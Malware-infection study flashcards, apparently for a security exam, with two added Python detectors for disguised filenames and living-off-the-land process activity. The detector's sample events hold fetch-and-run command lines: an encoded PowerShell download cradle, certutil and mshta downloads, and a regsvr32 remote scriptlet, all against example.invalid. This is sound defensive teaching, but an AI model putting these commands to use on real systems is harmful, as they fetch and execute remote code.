Section 3: Malware Infections Flashcards
Threat Vector
Method used by an attacker to access a victim’s machine
Attack Vector
Method used by an attacker to gain access to a victim’s machine in order to infect it with malware (the way we get to the machine and how we infect it)
What are the three most common delivery methods for malware infections?
Software, messaging (e-mail, IM), and removable media (USB drives, etc.)
What is a watering hole?
Malware is placed on a website that you know your potential victims will access
Botnet
A collection of compromised computers under the control of a master node
What is a zombie in a botnet?
One of the compromised computers in a botnet. The attacker controls the zombies from a C2 (Command and Control) server and uses them to carry out attacks, so the traffic appears to come from the victims' machines rather than the attacker's. Zombies are also used for processor-intensive work the attacker doesn't want to run on their own hardware.
What is a DDoS?
Distributed Denial of Service attack. The attacker uses many compromised machines (a botnet) to send requests to a target at the same time, overwhelming it so legitimate users can't reach it. The same botnet can also be put to other uses, such as mining cryptocurrency, but that is a separate abuse, not a denial of service.
Active Interception
Occurs when a computer is placed between the sender and receiver (a man-in-the-middle position) and is able to capture or modify the traffic between them.
Privilege Escalation
Occurs when you exploit a design flaw or bug in a system to gain access to resources that a normal user isn't allowed to access (think about the EternalBlue demo)
Backdoors
A hidden entry point used to bypass normal security and authentication controls so an attacker can get back into the system later
What is a Remote Access Trojan?
Malware placed by an attacker to maintain persistent remote control of the victim's machine.
Easter Egg
Non-malicious code that when invoked, displays an insider joke, hidden message, or secret feature
Logic Bomb
Malicious code that has been inserted inside a program and will execute only when certain conditions have been met, such as a date or a user being removed from payroll (adjacent to Easter eggs) (this is the attack used in Jurassic Park)
Symptoms of infection
The computer acts strangely: blue screens or lockups, frequent restarts, files or apps that can no longer be opened, strange noises, unusual error messages, a display that looks wrong, jumbled printouts, new or disappearing desktop icons, files with double extensions (e.g., invoice.pdf.exe), antivirus that won't run, unexpected new files or folders, or System Restore that no longer works
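The "double file extensions" symptom is one you can check for mechanically rather than by eye. The script below is an added example (not part of the original flashcards) that flags filenames whose final extension is executable while the one before it looks like a harmless document, and also the whitespace-padding trick where the real extension is pushed out of view in a file dialog. The extension sets and the sample filenames are constructed for the example.

```python
import os
import re

# Extensions Windows runs (or hands to a script host) on double-click. Constructed list.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe",
                   "wsf", "ps1", "hta", "msi", "lnk"}
# Extensions a user expects to be inert documents or media. Constructed list.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf",
                 "jpg", "jpeg", "png", "gif", "mp3", "mp4", "zip"}


def classify_filename(name):
    """Return a reason string if the name looks like a disguised executable, else None."""
    base = os.path.basename(name)
    stem, dot, last = base.lower().rpartition(".")
    if not dot:
        return None                      # no extension at all
    last = last.strip()
    if last not in EXECUTABLE_EXTS:
        return None                      # final extension is not something that executes
    # Case 1: a run of spaces before the real extension, e.g. "report          .exe",
    # so a narrow column in Explorer or a mail client shows only "report".
    if re.search(r"\s{3,}", stem):
        return "whitespace padding hides .%s" % last
    # Case 2: classic double extension, e.g. "invoice.pdf.exe". With "hide extensions
    # for known file types" on, Windows displays this as "invoice.pdf".
    prev = stem.rpartition(".")[2].strip()
    if prev in DOCUMENT_EXTS:
        return "double extension: .%s disguised as .%s" % (last, prev)
    return None


def scan_filenames(names):
    """Return (filename, reason) pairs for every suspicious name in the iterable."""
    findings = []
    for name in names:
        reason = classify_filename(name)
        if reason:
            findings.append((name, reason))
    return findings


# Constructed sample directory listing: four disguised executables, four benign names.
SAMPLE_FILENAMES = [
    "quarterly_report.pdf",
    "invoice.pdf.exe",
    "photo.jpg.scr",
    "setup.v2.exe",                       # two dots, but "v2" is not a document type
    "statement                                        .exe",
    "notes.txt",
    "macro.docm",
    "Resume.DOCX.js",
]

if __name__ == "__main__":
    for filename, reason in scan_filenames(SAMPLE_FILENAMES):
        print("%-60s %s" % (filename, reason))
```

Run it against a real download or mail-attachment folder with `scan_filenames(os.listdir(path))`. The "setup.v2.exe" case is deliberate: a second dot alone is not a symptom, it is the document-looking extension sitting in front of an executable one that is.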
Removing Malware Common Practices
Identify symptoms of infection
Quarantine the infected system so the infection can't spread (e.g., unplug the network cable or disable the network adapter)
Disable System Restore (on Windows) so the infection isn't captured in a restore point that could reinfect the machine later
Remediate the infected system (boot into Safe Mode, then scan with antivirus and remove the malware)
Schedule automatic updates and scans
Re-enable System Restore and create a new, clean restore point
Provide end user security awareness training
How can you remediate a boot sector virus?
Boot the computer from an external device (rescue disc or USB) and scan the drive from there, so the infected boot sector is never executed
Or remove the drive, attach it to a known-clean machine, and scan it from there
What are ways you can prevent viruses?
A good antivirus solution, keeping the system patched and updated, a good host-based firewall, and only visiting trusted websites
Best way to remediate a rootkit?
Reimage the machine (a rootkit hides itself from the OS and the AV, so you can't trust a scan to have found everything)
What is the best way to remediate spam?
Verify your email servers aren't configured as open relays (SMTP servers that accept and forward mail from anyone)
Remove email addresses from public web pages (spammers harvest them)
Use allow lists and block lists (whitelists and blacklists)
Train and educate end users
What is an exploit technique?
Describes the specific method by which malware code infects a target host
Most modern malware uses _________ techniques to avoid detection by signature based security software
Fileless
Process that attackers commonly follow for exploitation
Get a dropper onto the target machine
Maintain access
Strengthen access (escalate privileges)
Actions on objectives (they have enough permissions that they can start doing what they want to do)
Concealment (start hiding themselves and covering their tracks by doing things like clearing log entries)
Dropper
Malware designed to install or run other types of malware embedded in a payload on an infected host
Shellcode
Any lightweight code designed to run an exploit on a target (REMEMBER FOR THE TEST)
Code Injection
Exploit technique that runs malicious code under the process ID (PID) of a legitimate process, so it inherits that process's reputation and permissions
What is living off the land?
Exploit techniques that use standard system tools and packages already on the host (e.g., PowerShell, certutil, mshta) to perform intrusions, so no new binary is dropped for signature-based AV to catch
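Living off the land and fileless execution (the two cards above on fileless techniques and on living off the land) leave nothing on disk for a signature to match, so detection has to look at how built-in tools are being invoked instead. The script below is an added example, not part of the original flashcards, that runs a handful of such rules over constructed process-creation events (parent image, image, command line, loosely modelled on Windows event 4688 / Sysmon event 1 fields) and also decodes PowerShell `-EncodedCommand` payloads so a download cradle hidden in base64 still gets caught. The rule names, the event format, and the sample events (including the `example.invalid` URLs) are all assumptions made for the example.

```python
import base64
import re

# Office applications that should not normally launch a script host. Constructed list.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Built-in binaries commonly abused to run or fetch code (LOLBins). Constructed list.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Fragments typical of a PowerShell download-and-execute cradle.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
                       r"invoke-expression|\biex\b|frombase64string", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 token of plausible length.
ENC_RE = re.compile(r"(?<![\w-])-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else None.
    PowerShell expects base64 of UTF-16LE text, so that is what we decode."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(parent, image, cmdline):
    """Return the list of rule names this event triggers (empty if it looks benign)."""
    hits = []
    parent_l, image_l, cmd_l = parent.lower(), image.lower(), cmdline.lower()
    if parent_l in OFFICE_PARENTS and image_l in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")           # macro -> shell is the classic chain
    if image_l == "certutil.exe" and "-urlcache" in cmd_l:
        hits.append("certutil-download")                   # certutil used as a downloader
    if image_l in {"mshta.exe", "regsvr32.exe", "rundll32.exe"} and URL_RE.search(cmdline):
        hits.append("lolbin-remote-url")                   # script fetched straight from a URL
    if image_l in {"powershell.exe", "pwsh.exe"}:
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd_l) or re.search(r"-nop\b|-noprofile", cmd_l):
            hits.append("powershell-stealth-flags")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            hits.append("powershell-encoded-command")
            if CRADLE_RE.search(decoded):
                hits.append("download-cradle-in-decoded-script")
        elif CRADLE_RE.search(cmdline):
            hits.append("download-cradle")
    return hits


def scan_events(events):
    """Return (index, image, hits) for every event that triggers at least one rule."""
    findings = []
    for idx, (parent, image, cmdline) in enumerate(events):
        hits = analyze_event(parent, image, cmdline)
        if hits:
            findings.append((idx, image, hits))
    return findings


# Constructed encoded payload: what a malicious macro typically hands to PowerShell.
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16-le")
).decode("ascii")

# Constructed sample events: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\bob\\todo.txt"),
    ("WINWORD.EXE", "powershell.exe", "powershell.exe -nop -w hidden -enc " + ENCODED_CRADLE),
    ("cmd.exe", "certutil.exe",
     "certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\\Users\\Public\\p.txt"),
    ("cmd.exe", "certutil.exe", "certutil.exe -hashfile C:\\installer.msi SHA256"),
    ("explorer.exe", "mshta.exe", "mshta.exe http://example.invalid/x.hta"),
    ("cmd.exe", "regsvr32.exe", "regsvr32.exe /s /n /u /i:http://example.invalid/s.sct scrobj.dll"),
    # A scheduled admin script: same binary, no stealth or download indicators, so it is left alone.
    ("svchost.exe", "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for idx, image, hits in scan_events(SAMPLE_EVENTS):
        print("event %d %-15s %s" % (idx, image, ", ".join(hits)))
```

The fourth and seventh events are there on purpose: `certutil -hashfile` and a scheduled `-File` script use exactly the binaries an attacker would, so the rules key on the arguments (`-urlcache`, a URL, `-w hidden`, an encoded command) rather than on the tool name alone, which keeps the false-positive rate down when this runs over real telemetry.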